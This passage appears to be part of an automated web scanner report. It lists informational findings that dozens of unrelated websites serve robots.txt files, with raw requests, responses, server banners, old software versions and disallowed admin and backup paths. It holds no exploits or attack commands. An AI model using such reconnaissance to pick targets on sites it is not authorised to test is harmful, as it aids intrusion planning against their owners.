Allow: /
Disallow: /post/report/

26.843. http://www.raiderimage.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.raiderimage.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.raiderimage.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:06 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 11:46:06 GMT
Last-Modified: Tue, 19 Apr 2011 05:04:53 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.844. http://www.rainbird.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rainbird.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rainbird.com

Response

HTTP/1.0 200 OK
Content-Length: 24
Content-Type: text/plain
ETag: "02b1518e4fcc41:39e"
Server: Microsoft-IIS/6.0
Last-Modified: Mon, 17 Jan 2005 22:30:06 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:13:47 GMT
Connection: close

User-agent: *
Disallow:

26.845. http://www.rareseeds.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rareseeds.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rareseeds.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:02:18 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 06:01:10 GMT
Accept-Ranges: bytes
Content-Length: 511
Cache-Control: max-age=31536000
Expires: Wed, 02 May 2012 11:02:18 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /checkout
Disallow: /catalog
Disallow: /skin
Disallow: /js
Disallow: /sendfriend
Disallow: /wishlist
Disallow: /cart
Disallow: /review
Disallow: /media/
Disallow: /2009
Disall
...[SNIP]...

26.846. http://www.rats2u.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rats2u.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rats2u.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:40 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.7 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Last-Modified: Thu, 19 Jul 2007 20:27:14 GMT
ETag: "c90001-24-469fc922"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

26.847. http://www.rauantiques.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rauantiques.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rauantiques.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:57 GMT
Server: Apache/2.2.11 (Unix)
Last-Modified: Mon, 07 Feb 2011 16:17:23 GMT
ETag: "298800a-b5-49bb3911eaac0"
Accept-Ranges: bytes
Content-Length: 181
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /*follow=no*
Disallow: /account/
Disallow: /checkout/
Disallow: /search*
Disallow: /zoom/
Disallow: /jewelry3.jsp*
Disallow: /searchproduct.jsp*

26.848. http://www.raylamontagne.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.raylamontagne.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.raylamontagne.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:44 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 13 Oct 2010 15:49:28 GMT
ETag: "3858b5-a08-4928189d95200"
Accept-Ranges: bytes
Content-Length: 2568
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:20:44 GMT
P3P: CP=HONK
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.849. http://www.re-inks.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.re-inks.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.re-inks.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 08 Nov 2010 22:48:50 GMT
Accept-Ranges: bytes
ETag: "b03ac11c977fcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:19:51 GMT
Connection: close
Content-Length: 6747

Sitemap:http://www.re-inks.com/sitemap.xml

User-agent: *
Disallow: /_private/
Disallow: /awstats/
Disallow: /cgi-bin/
Disallow: /Scripts/
Disallow: /css/
Disallow: /test/
Disallow: /Template
...[SNIP]...

26.850. http://www.realcareeradvice.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.realcareeradvice.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realcareeradvice.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Content-Location: http://www.realcareeradvice.com/robots.txt
Last-Modified: Thu, 10 Jun 2010 14:00:16 GMT
Accept-Ranges: bytes
ETag: "e3fc3941a58cb1:2ba86"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:26:10 GMT
Connection: close

User-agent: *
Disallow: /

26.851. http://www.realestate-mls.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.realestate-mls.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realestate-mls.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:30:19 GMT
Server: Apache/2.0.55 (Unix) mod_ssl/2.0.55 OpenSSL/0.9.8k PHP/4.4.2 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Wed, 04 Sep 2002 17:18:06 GMT
ETag: "57413-10d-3a9d59eb62f80"
Accept-Ranges: bytes
Content-Length: 269
Connection: close
Content-Type: text/plain

# go away
User-agent: *
Disallow: /cgi
Disallow: /etc
Disallow: /images
Disallow: /member
Disallow: rmls.cgi
Disallow: /usage
Disallow: /analog
Disallow: /test
Disallow: /example
Disallow: /rmls
Disal
...[SNIP]...

26.852. http://www.realestateagentsfinder.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.realestateagentsfinder.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realestateagentsfinder.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 03 May 2011 11:43:04 GMT
Content-Type: text/plain
Connection: close
Content-Length: 580
Content-Location: http://www.realestateagentsfinder.com/robots.txt
Last-Modified: Fri, 30 May 2008 20:54:32 GMT
Accept-Ranges: bytes
ETag: "a2573c5c97c2c81:2777"
X-Powered-By: ASP.NET
Set-Cookie: BIGipServerexperthub_serv_POOL2=3034910892.20480.0000; path=/

# Format is:
#
# This is a file retrieved by webwalkers a.k.a. spiders that
# conform to a defacto standard.
# See <URL:http://www.robotstxt.org/wc/exclusion.html#robotstxt>
# User-agent:
...[SNIP]...

26.853. http://www.realestatetechnologyonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.realestatetechnologyonline.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realestatetechnologyonline.com

Response

HTTP/1.1 200 OK
Content-Length: 432
Content-Type: text/plain
Content-Location: http://www.realestatetechnologyonline.com/robots.txt
Last-Modified: Mon, 17 Nov 2008 04:14:56 GMT
Accept-Ranges: bytes
ETag: "c61062c6b48c91:2afe63"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:17:17 GMT
Connection: close

User-agent: *
Disallow: /_compareTemp/
Disallow: /images/
Disallow: /Photoshop/
Disallow: /cgi_bin/
Disallow: /payment_input/
Disallow: /fckeditor/
Disallow: /members/
Disallow: /register/
Di
...[SNIP]...

26.854. http://www.realitytvcalendar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.realitytvcalendar.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realitytvcalendar.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:56:54 GMT
Server: Apache
Last-Modified: Wed, 05 Apr 2006 15:47:38 GMT
ETag: "1364154-f2-4433e69a"
Accept-Ranges: bytes
Content-Length: 242
Connection: close
Content-Type: text/plain

# Robots.txt file created by http://www.webtoolcentral.com
# For domain: http://www.realitytvcalendar.com

# All robots will spider the domain
User-agent: *
Disallow:

# Disallow directory /cg
...[SNIP]...

26.855. http://www.realwebaudio.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.realwebaudio.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realwebaudio.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:20:07 GMT
Server: Apache
Last-Modified: Thu, 09 Dec 2004 21:27:55 GMT
ETag: "82dffcd-220-82e34cc0"
Accept-Ranges: bytes
Content-Length: 544
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /A.html
Disallow: /B.html
Disallow: /C.html
Disallow: /D.html
Disallow: /E.html
Disallow: /F.html
Disallow: /G.html
Disallow: /H.html
Disallow: /I.html
Disa
...[SNIP]...

26.856. http://www.recetasgratis.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.recetasgratis.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.recetasgratis.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:32:35 GMT
Server: Apache
Last-Modified: Tue, 02 Dec 2008 19:23:14 GMT
ETag: "3f10cf-45-45d15423f8c80"
Accept-Ranges: bytes
Content-Length: 69
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:

User-agent: Mediapartners-Google*
Disallow:

26.857. http://www.recipetrove.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.recipetrove.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.recipetrove.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:58 GMT
Server: Apache
Last-Modified: Mon, 15 Feb 2010 15:47:24 GMT
ETag: "2cef65-13d-47fa5888b3b00"
Accept-Ranges: bytes
Content-Length: 317
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
D
...[SNIP]...

26.858. http://www.reddead.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reddead.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reddead.net

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 03 May 2011 11:36:46 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.reddead.net/xmlrpc.php

User-agent: *
Disallow:

Sitemap: http://www.reddead.net/sitemap.xml.gz

26.859. http://www.redtag.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redtag.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.redtag.com

Response

HTTP/1.1 200 OK
Content-Length: 32
Content-Type: text/plain
Last-Modified: Fri, 25 Jul 2008 21:40:42 GMT
Accept-Ranges: bytes
ETag: "06937169feec81:c4242"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:58:09 GMT
Connection: keep-alive

User-agent: *
Disallow: /app/

26.860. http://www.reflector.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reflector.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reflector.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:23:20 GMT
Content-Type: text/plain
Connection: close
Vary: Accept-Encoding
Content-Length: 28
Last-Modified: Sat, 23 Apr 2011 00:43:56 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

#User-agent: *
#Disallow: /

26.861. http://www.refundsweepers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.refundsweepers.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.refundsweepers.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:54:14 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 15 Oct 2007 20:58:35 GMT
ETag: "31822e1-8d-43c8e54f1d4c0"
Accept-Ranges: bytes
Content-Length: 141
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ads/
Disallow: /links/
Disallow: /newsletter/
Disallow: /coupon/cid/
Disallow: /coupon/
Disallow: /shopping/view/go

26.862. http://www.registerstar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.registerstar.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.registerstar.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Tue, 03 May 2011 10:08:54 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=5000
Accept-Ranges: bytes
Last-Modified: Tue, 20 Apr 2010 13:19:22 GMT
Real-Hostname: registerstar.com
Content-Length: 1150
Connection: close
X-Cache-Info: cached

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebot
Disall
...[SNIP]...

26.863. http://www.relylocal.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.relylocal.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.relylocal.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 26 Apr 2011 04:21:49 GMT
ETag: "4e41e5-cc-4a1caa9ad1140"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

26.864. http://www.rentawreck.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rentawreck.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rentawreck.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:47:45 GMT
Server: Apache
Last-Modified: Mon, 22 Dec 2008 16:50:48 GMT
ETag: "15916-b9-75ee2a00"
Accept-Ranges: bytes
Content-Length: 185
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /warp
Disallow: /admin
Disallow: /training
Disallow: /advert
Disallow: /local
Disallow: /franrefer
Disallow: /forms
Disallow: /reach
Disallow: /beta

26.865. http://www.rentometer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rentometer.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rentometer.com

Response

HTTP/1.1 200 OK
Server: nginx/0.5.35
Date: Tue, 03 May 2011 10:17:52 GMT
Content-Type: text/plain
Content-Length: 146
Last-Modified: Tue, 19 Apr 2011 22:50:23 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
User-agent: *
Disallow: /rentometer/compare/

26.866. http://www.restaurantrow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.restaurantrow.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.restaurantrow.com

Response

HTTP/1.1 200 OK
Content-Length: 525
Content-Type: text/plain
Content-Location: http://www.restaurantrow.com/robots.txt
Last-Modified: Tue, 11 Aug 2009 21:57:03 GMT
Accept-Ranges: bytes
ETag: "c66633a9ce1aca1:14d7"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:26:37 GMT
Connection: close

User-agent: Mediapartners-Google *
Disallow: /upcontrol
Disallow: /images
Disallow: /rownet
Disallow: /adtracker
Disallow: /ads
Disallow: /mapy.cfm
Disallow: /mapping.cfm
Disallow: /op
...[SNIP]...

26.867. http://www.revues.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revues.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.revues.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:26 GMT
Server: Apache
Last-Modified: Mon, 05 Oct 2009 09:27:07 GMT
ETag: "1a84437-da-4752cb7a690c0"
Accept-Ranges: bytes
Content-Length: 218
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /styles_revue.css
Disallow: /styles_lodel.css
Disallow: /depot/
Disallow: /statistiques/
Disallow: /oai/
Sitemap: http://www.revues.org/?page=sitemap

User-agent: wget
Disallow
...[SNIP]...

26.868. http://www.ricedelman.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ricedelman.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ricedelman.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:04:42 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
ETag: "CBGamyWBQaL"
Last-Modified: Mon, 14 Mar 2011 14:07:12 GMT
Accept-Ranges: bytes
Content-Length: 98
Set-Cookie: JSESSIONID=aXWXP2RttTCg-MaI1_; path=/
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /cs/pressroom

Sitemap: http://www.ricedelman.com/sitemap.xml

26.869. http://www.richlandone.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.richlandone.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.richlandone.org

Response

HTTP/1.1 200 OK
Content-Length: 132
Content-Type: text/plain
Content-Location: http://www.richlandone.org/robots.txt
Last-Modified: Tue, 30 May 2006 20:50:05 GMT
Accept-Ranges: bytes
ETag: "f2146da12a84c61:2b4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
Date: Tue, 03 May 2011 10:51:33 GMT
Connection: close

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

26.870. http://www.rifftrax.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rifftrax.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rifftrax.com

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/plain
Last-Modified: Fri, 04 Feb 2011 16:01:17 GMT
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 01:33:28 GMT
Vary: Accept-Encoding
X-AH-Environment: prod
Content-Length: 1600
Date: Tue, 03 May 2011 10:48:47 GMT
X-Varnish: 1231549174 1226412133
Age: 33320
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 64

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.871. http://www.rigolus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rigolus.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rigolus.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:08:14 GMT
Server: Apache/1.3.37 (Unix) mod_gzip/1.3.19.1a PHP/4.4.4 mod_ssl/2.8.28 OpenSSL/0.9.6m
Last-Modified: Tue, 14 Oct 2008 17:13:34 GMT
ETag: "65853-307-48f4d33e"
Accept-Ranges: bytes
Content-Length: 775
Connection: close
Content-Type: text/plain

# robots.txt
User-agent: *
Disallow:/top

User-agent: Anawave
User-agent: EmailCollector
User-agent: EmailSiphon
User-agent: ExtractorPro
User-agent: FlashSite
User-agent: Go-Get-It
User-agent: Grab-a
...[SNIP]...

26.872. http://www.rivermarkcu.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rivermarkcu.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rivermarkcu.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:56 GMT
Server: Apache
Last-Modified: Mon, 15 Nov 2010 22:54:10 GMT
ETag: "3d024f-130-4951f51752880"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /rivermark_mobile.html
Disallow: /new_online_banking.html
Disallow: /low_349_fixed_apr.html
Disallow: /visa_reloadable_prepaid_card.html
Disallow: /visa_prepaid_cards.htm
...[SNIP]...

26.873. http://www.ronstire.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ronstire.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ronstire.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:57 GMT
Server: Apache/1.3.27 (Unix) mod_perl/1.27 PHP/4.2.3 mod_fastcgi/2.2.12 FrontPage/5.0.2.2510 mod_jk/1.2.0 mod_ssl/2.8.11 OpenSSL/0.9.6g
Last-Modified: Tue, 28 Aug 2001 19:11:16 GMT
ETag: "44d0aa-37-3b8becd4"
Accept-Ranges: bytes
Content-Length: 55
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /wwwstat/

26.874. http://www.rotary.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rotary.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rotary.org

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 164
Date: Tue, 03 May 2011 10:30:58 GMT
Content-Type: text/plain
ETag: "{9AADC3D1-7469-4D27-8FF2-E9F356BC9400},1"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=86300, no-check
X-Powered-By: ASP.NET
Last-Modified: Tue, 08 Feb 2011 19:21:47 GMT
ResourceTag: rt:9AADC3D1-7469-4D27-8FF2-E9F356BC9400@00000000001
Exires: Mon, 18 Apr 2011 10:30:58 GMT
Cache-Control: private,max-age=0
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: BIGipServermoss_80=3850832394.20480.0000; path=/
Set-Cookie: BIGipServerrotary.org_80=3574272172.20480.0000; path=/

User-agent: *
Disallow: /selfservice/
Disallow: /securedg/
Disallow: /securememberservices/
Disallow: /secureselfservice/
Allow: /
Disallow: /nominations/

26.875. http://www.royalvegas.eu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.royalvegas.eu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.royalvegas.eu

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 08 Oct 2010 07:55:36 GMT
Accept-Ranges: bytes
ETag: "f1fb3331be66cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Tue, 03 May 2011 10:59:41 GMT
Connection: close
Content-Length: 167

User-agent: *
Disallow: /download.casino*
Disallow: /aff/*
Disallow: /de/aff/*
Disallow: /es/aff/*
Disallow: /el/aff/*
Disallow: /fr/aff/*
Disallow: /nl/aff/*

26.876. http://www.rp-online.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rp-online.de
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rp-online.de

Response

HTTP/1.1 200 OK
Date: Mon, 11 Oct 2010 11:03:54 GMT
Server: Apache/2.2.8
Last-Modified: Thu, 01 Jul 2010 16:04:13 GMT
Accept-Ranges: bytes
Content-Length: 5370
Content-Type: text/plain
X-Cache: HIT from proxy3.1.rp-online.de
X-Cache-Lookup: HIT from proxy3.1.rp-online.de:80
Vary: Accept-Encoding
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-Agent: *
Disallow: /includes/nav/
Disallow: /includes/campaigns/
#Disallow: /public/extern/
Disallow: /objects/
Disallow: /adm/
Disallow: /app/ngz/
Di
...[SNIP]...

26.877. http://www.rpgfan.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rpgfan.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rpgfan.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:13:04 GMT
Server: Apache
Last-Modified: Tue, 02 Dec 2008 22:50:03 GMT
ETag: "2000351-38-4935bb9b"
Accept-Ranges: bytes
Content-Length: 56
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /cgi-bin/

Disallow: /userdirs/

26.878. http://www.rr-bb.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rr-bb.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rr-bb.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:12 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 10 Sep 2007 04:24:09 GMT
ETag: "c6c08e-1d-439c05c20cc40"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain

User-agent: Slurp
Disallow: /

26.879. http://www.rtl.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rtl.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rtl.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:16 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 18:46:26 GMT
ETag: "9f-49f16a95d2e53"
Accept-Ranges: bytes
Content-Length: 159
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /phpmyadmin
Disallow: /Scripts
Disallow: /bkup
Disallow: /error
Disallow: /mainimages
Disallow: /SpryAssets
Disallow: /_notes
Allow: /

26.880. http://www.rugdoctor.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rugdoctor.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rugdoctor.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:03 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 14:08:38 GMT
ETag: "a3-4716e580"
